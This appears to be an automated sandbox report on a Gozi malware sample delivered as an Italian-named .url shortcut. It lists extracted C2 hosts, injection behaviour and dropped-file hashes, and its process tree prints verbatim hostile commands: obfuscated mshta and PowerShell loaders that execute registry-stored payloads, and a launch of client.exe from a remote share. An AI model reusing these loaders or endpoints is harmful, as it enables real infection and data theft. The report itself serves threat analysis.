Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 16:51
Static task
static1
Behavioral task
behavioral1
Sample
Informazioni.url
Resource
win7-20230831-en
General
-
Target
Informazioni.url
-
Size
192B
-
MD5
c6c6f5a3d3e0444820d2865c7f1a07bc
-
SHA1
5f9c9620e315b09802e8e532f48195a9e60f2d2c
-
SHA256
59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f
-
SHA512
4a1a66efff8336bbde327c9256e6e473193c901bc47d1b7648bbfa29212490f3f47092ba060c47cc77a1e6952f6bf814346045d2d1c1eef556ba07d08f69c628
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
expirew.com
whofos.com
onlinepoints.online
onlinepoints.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 5080 set thread context of 3156 5080 powershell.exe Explorer.EXE PID 3156 set thread context of 3744 3156 Explorer.EXE RuntimeBroker.exe PID 3156 set thread context of 3196 3156 Explorer.EXE RuntimeBroker.exe PID 3156 set thread context of 4936 3156 Explorer.EXE RuntimeBroker.exe PID 3156 set thread context of 4868 3156 Explorer.EXE cmd.exe PID 3156 set thread context of 4652 3156 Explorer.EXE RuntimeBroker.exe PID 4868 set thread context of 532 4868 cmd.exe PING.EXE PID 3156 set thread context of 688 3156 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2520 496 WerFault.exe client.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 532 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 496 client.exe 496 client.exe 5080 powershell.exe 5080 powershell.exe 5080 powershell.exe 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3156 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 5080 powershell.exe 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 3156 Explorer.EXE 4868 cmd.exe 3156 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 5080 powershell.exe Token: SeShutdownPrivilege 3156 Explorer.EXE Token: SeCreatePagefilePrivilege 3156 Explorer.EXE Token: SeShutdownPrivilege 3156 Explorer.EXE Token: SeCreatePagefilePrivilege 3156 Explorer.EXE Token: SeShutdownPrivilege 3156 Explorer.EXE Token: SeCreatePagefilePrivilege 3156 Explorer.EXE Token: SeShutdownPrivilege 3156 Explorer.EXE Token: SeCreatePagefilePrivilege 3156 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3156 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3156 Explorer.EXE -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4204 wrote to memory of 496 4204 rundll32.exe client.exe PID 4204 wrote to memory of 496 4204 rundll32.exe client.exe PID 4204 wrote to memory of 496 4204 rundll32.exe client.exe PID 3296 wrote to memory of 5080 3296 mshta.exe powershell.exe PID 3296 wrote to memory of 5080 3296 mshta.exe powershell.exe PID 5080 wrote to memory of 1108 5080 powershell.exe csc.exe PID 5080 wrote to memory of 1108 5080 powershell.exe csc.exe PID 1108 wrote to memory of 948 1108 csc.exe cvtres.exe PID 1108 wrote to memory of 948 1108 csc.exe cvtres.exe PID 5080 wrote to memory of 1340 5080 powershell.exe csc.exe PID 5080 wrote to memory of 1340 5080 powershell.exe csc.exe PID 1340 wrote to memory of 3412 1340 csc.exe cvtres.exe PID 1340 wrote to memory of 3412 1340 csc.exe cvtres.exe PID 5080 wrote to memory of 3156 5080 powershell.exe Explorer.EXE PID 5080 wrote to memory of 3156 5080 powershell.exe Explorer.EXE PID 5080 wrote to memory of 3156 5080 powershell.exe Explorer.EXE PID 5080 wrote to memory of 3156 5080 powershell.exe Explorer.EXE PID 3156 wrote to memory of 3744 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3744 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3744 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3744 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3196 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3196 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4868 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 4868 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 4868 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 3196 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 3196 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4936 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4936 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4936 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4936 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4652 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4652 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4868 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 4652 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4652 3156 Explorer.EXE RuntimeBroker.exe PID 3156 wrote to memory of 4868 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe PID 4868 wrote to memory of 532 4868 cmd.exe PING.EXE PID 4868 wrote to memory of 532 4868 cmd.exe PING.EXE PID 4868 wrote to memory of 532 4868 cmd.exe PING.EXE PID 4868 wrote to memory of 532 4868 cmd.exe PING.EXE PID 4868 wrote to memory of 532 4868 cmd.exe PING.EXE PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe PID 3156 wrote to memory of 688 3156 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3744
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Informazioni.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4204 -
\??\UNC\62.173.146.46\scarica\client.exe"\\62.173.146.46\scarica\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 4723⤵
- Program crash
PID:2520
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4936
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3196
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>L2if='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(L2if).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fyaxafftc -value gp; new-alias -name xuojhr -value iex; xuojhr ([System.Text.Encoding]::ASCII.GetString((fyaxafftc "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iik411s4\iik411s4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6404.tmp" "c:\Users\Admin\AppData\Local\Temp\iik411s4\CSC4C02830939C64F0B8B8630EC5D336D34.TMP"5⤵PID:948
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adpbnxuo\adpbnxuo.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6750.tmp" "c:\Users\Admin\AppData\Local\Temp\adpbnxuo\CSCF0D553C4CCDE4FDDB9DFCD8375232B18.TMP"5⤵PID:3412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.46\scarica\client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:532 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:688
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 496 -ip 4961⤵PID:4416
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d0541a62f5f8288f06de543ad891ded8
SHA182c17f84b94266d1a85f106a09b46b280dae2d09
SHA256891c27dcc24e5dc05dbc96de6e28458db08a1e5832a16c31e7ab0694f6a989e6
SHA512168cf5a52781dafbc9f3e770b3de828916288e78b6b335232008ecea8a25157ff89d903eb7badb5dc70585b6ecc2850ce204bde0191de195b677076029d9d606
-
Filesize
1KB
MD59a8c7537551cbf0d7a75c6f2d927940c
SHA10b5ee6c52ad7a141b7b469750e9e95dce2b9d243
SHA25604fecb8ff012fc434a2f545d122c559716cff13b501fe5337e529f348e11f5a7
SHA5121a874e89c9750b214530fa73a55ef86ea7444fa733babcc3cc9079495c9df11b06e9884119f1a26c27bea01c5ebc1b703071564e836d7bbc5f3d74ef4847952e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5ca9e80021560480c1cb96b3c65039040
SHA1abae29480483ed5900864b1280d54e7fe2f0a70e
SHA2567f563c1bb94b686e0aa537ac142e707b1fc0b5dac0cf5d791cb0eec7325d1e96
SHA51295664242c661296c59a19b54dce28cecc8ef0d361dbfa42a84d9ab62386be5b59561257ff4c3d2c435901c2c9fea89524d849708f1e611e745da395425a10bcc
-
Filesize
3KB
MD5c542245fd06ed94d7bb4bae83743d52a
SHA1686bb8227e95e1a478d0c49b15cfa69b99308feb
SHA256fc62ea7d8262f942841496c16c71453e04329e73826f47f36bd942bb334ac687
SHA512bc33f42012d68d5d6058a346be9ac6b9d4be4c3b8339c6b0da067a09de0be6badfe0a87f34a4d4a65c410e18263d889e4c06e500c1af86d8c865e42063da8834
-
Filesize
652B
MD55f5ab3d65e010ab6af5330066c83e367
SHA15b198fd5d0df0615077fb0bca59b4ec472dac685
SHA25612cfed10e9f2387a5c275cbb0dd5fdd6b6ac251c2c16feee89852004a8dd406d
SHA5123e528a40ddc0b0718168febe7edee76593075aca64203bc8acd7bdc4c99b97c9e50812f9bfef450d9d397280ef0f08ad96d978a0d8edc0c64e4218880783214c
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5a8bdd5b219cea16f4b06f63f5ade9a01
SHA1c43d4889d6ea357e93874589606a638ee47b184b
SHA2567c284439f49c53cf6c8396974868f436fb4334e09e0486c06be31ab34d96255e
SHA512bc7576414bc4c6c6bb3679ae603605848fcce196ad8ddb90dab5d749dc92ea8040991b6f9a765316aff0384eb9efe67cc0c812dc15dd7e22ea4c1fbcbe4ada10
-
Filesize
652B
MD504ccc63e952287b2e5e36c3727d390de
SHA1dfd0a1852ae7009f2700e9ec89ef423575c0b574
SHA256e85be18bc78e1c731d8f184a983b596fd3c08156237b562059f3405b23ded01a
SHA512b88f746c6aef785ba38074acf37068f4c8d8cb3e49def9c3a8093a9ab14fb89be6ea2c4420c4b454d3825f39494e27beb90d409e9c3d688ccfeb7cf2c2129231
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD52b798c670375c92df5868d9590d10eb5
SHA18f89aeee4dadb10321fe01c6ccf83b47d4f4431d
SHA256c7e9b02f2d17f273f65f0083e8f8c5d9b839bd72008fcbd1dfd7aa5a1cf37d91
SHA5125583799b1245fdf9fb077814ff3b6743fcd997aa399ad75c1fa8e1b12caf4768a5274d03bf99fc58b12dfa5c8e98b0a208742865e8c4aad020141c43e1468a09